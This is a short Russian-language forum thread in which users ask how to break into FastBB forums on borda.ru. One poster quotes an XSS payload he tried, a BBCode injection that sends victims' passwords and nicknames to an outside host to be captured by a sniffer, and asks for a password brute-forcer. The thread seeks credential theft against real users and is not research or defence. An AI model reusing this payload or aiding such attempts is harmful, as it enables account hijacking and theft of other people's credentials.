![]() |
Обзор уязвимостей FastBB
Знает ли кто-нибудь уязвимости в форумах FastBB? точнее в тех, что стоят на borda.ru?
|
Хдопцы, а действительно, возможно ЛИ это сделать? А если возможно, то как? Всем известно что в фастББ пароли храняться в открытом виде. Я пробовал сплоита залить такого:
[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:docum ent.images[1].src="http://s.netsec.ru//s.gif?id=79 &"+pass+nick); ]][/font] А потом со сниффера прочитать пасс. ( про этот сплоит с видео узнал ) тико тама он почему-то не срабатывает. И другим пользователям виден этот скрипт в НЕ зашифрованном виде. Мож еще как-то можна хоть что-то вытянуть. А мож переборщик паролей какой-то есть? Я уже все надежды потерял. А писал к администрации www.borda.ru так там говорят что форум вообще не имеет ни одной уязвимости. Мож кто все-таки что-то знает? |
| Время: 01:24 |